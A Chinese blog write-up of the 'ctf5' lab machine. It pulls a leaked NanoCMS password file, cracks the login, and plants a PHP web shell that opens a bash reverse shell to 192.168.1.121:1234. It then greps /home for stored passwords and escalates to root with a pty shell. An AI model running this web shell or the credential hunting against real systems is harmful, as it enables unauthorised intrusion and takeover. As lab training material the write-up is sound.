首页 > 其他分享 >靶机 ctf5

靶机 ctf5

时间:2024-09-12 21:47:34浏览次数:1  
标签:文件 ctf5 dev 搜索 pass home 靶机 目录

暴露了很多端口

80端口发现是nanocms、

查询exploit

http://192.168.200.144/~andy/data/pagesdata.txt

会暴露密码

searchsploit nanocms 那个根本利用不了的

破解密码得出shannon

进入cms添加一句话马,执行

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.121/1234 0>&1'"); ?>

本地监听1234端口成功得到shell

linpeas.sh没跑出来东西,也就是没看到什么备份文件了

红队笔记中学到了新东西

可以在某目录下递归搜索含有某个字符串的文件

grep -R -i pass /home/* 2>/dev/null

直接拿网上的抄过来了

该命令的含义是在/home/目录下递归搜索包含不区分大小写的字符串"pass"的文件,并将搜索结果输出到标准输出。命令的具体解释如下:

grep: 是一个用于在文件中搜索指定模式的命令。
-R: 表示递归搜索,将在指定目录及其子目录下搜索文件。
-i: 表示忽略大小写,在搜索时不区分大小写。
pass: 是要搜索的字符串模式。
/home/*: 搜索的目录路径,/home/表示在/home/目录下搜索,*表示搜索所有子目录和文件。
2>/dev/null: 将标准错误输出重定向到/dev/null设备,这样错误信息将被丢弃而不会显示在终端上。

注意到有可疑文件

image-20240905182500587

猜测root密码是这个50$cent

bash-3.2$ su -
standard in must be a tty

可能是因为shell不完整导致的

python -c "import pty;pty.spawn('/bin/bash')"

提权成功

su -

标签:文件,ctf5,dev,搜索,pass,home,靶机,目录
From: https://www.cnblogs.com/ethereal258/p/18411154

相关文章

  • 靶机 ctf7
    可交互shellpython2-c'importpty;pty.spawn("/bin/bash")'mysql命令mysql-u-pshowdatabase;usexxxx退出exit/qawkcatsql|awk-F'''{print$2}'密码爆破hashcat-m0-a0passwd/usr/share/wordlists/rockyou.t......
  • 知攻善防 Web2 应急靶机笔记
    知攻善防Web2应急靶机笔记概述这是一台知攻善防实验室的应急响应靶机,主要还是练习应急响应的一些技巧,熟悉一些应急所用到的工具。靶机可以关注他们的公众号《知攻善防实验室》进行获取题目欢迎使用知攻善防实验室解题系统:在解题前,请确保您已解的一下内容:1.攻击者的I......
  • 靶机 primer
    primer虚假的打法dirbdirbhttp://192.168.1.115-X.php.txt-X指定后缀参数爆破Fuzzing/Fuzz_For_Webatmaster·hacknpentest/Fuzzing·GitHubwfuzz-c-w/usr/share/wfuzz/wordlist/general/common.txt--hc404--hw500http://website-ip/index.php?FUZZ=s......
  • DC-3靶机
    nmap-sV10.204.11.0/24先进行扫描找到靶机开启了80端口查看一下再扫一下目录发现后台登陆页面http://10.204.11.6/administrator/没有账号密码去查一下这个cms的漏洞我们直接sqlmap查出我们所要用的全部信息即可pythonsqlmap.py-u"http://10.204.11.6:80/index......
  • 红日靶机(一) 笔记
    红日靶机(一)笔记概述域渗透靶机,可以练习对域渗透的一些知识,主要还是要熟悉powershell语法,powershell往往比cmd的命令行更加强大,而很多渗透开源的脚本都是powershell的。例如NiShang,PowerView等等。这是域渗透的初学靶机。其中也遇到了一些问题靶机地址:http://vulnsta......
  • Tomato靶机通关攻略
    步骤一:进行端口扫描,找寻靶机地址步骤二:访问靶机地址步骤三:利用dirb进行扫描得出:/antibot_image/进行访问步骤四:进入antibots->info.php->右击进入页面源代码->发现存在文件包含漏洞步骤五:页面通过image传参查看passwd文件步骤六:页面通过image传参查看日志文件......
  • hackme靶机通关攻略
    1.登陆靶场网站首页2.注册登录3.单机search,有很多书4.搜索一本书抓包发放到重放器5.数据改为1*,复制数据包到1.txt,发到kali里面6.sqlmap查看当前数据库sqlmap-r'/home/kali/Desktop/1.txt' --current-db--batch7.查看表名sqlmap-r'/home/kali/Desktop/1.t......
  • HTB-Runner靶机笔记
    HTB-Runner靶机笔记概述Runner是HTB上一个中等难度的Linux靶机,它包含以下teamcity漏洞(CVE-2023-42793)该漏洞允许用户绕过身份验证并提取API令牌。以及docker容器逃逸CVE-2024-21626,进行提权操作Runner靶机地址:https://app.hackthebox.com/machines/Runner一、nmap扫描1)端......
  • dc-2靶机
    一:使用nmap工具进行端口扫描我们靶机地址为192.168.78.147,最直接的方法就是用端口扫描工具,查看次ip开放的端口,Nmap-A-p0-65535192.168.78.147二:访问80端口web页面发现无法访问:我们仔细想想,我们输入的是IP地址,但是他页面显示dc-2域名,发现可能用到的技术有dns,那我们尝试dn......
  • DC-1靶机通关教学(DC靶场系列)
    靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/下载完靶机之后需要在虚拟机运行,并且要和kali连接同一网段一、(信息收集)主机发现arp-scan-l-Ieth2通过扫描发现靶机ip地址是192.168.42.133二、(信息收集)端口扫描nmap-A-p-192.168.42.133发现目标靶机开......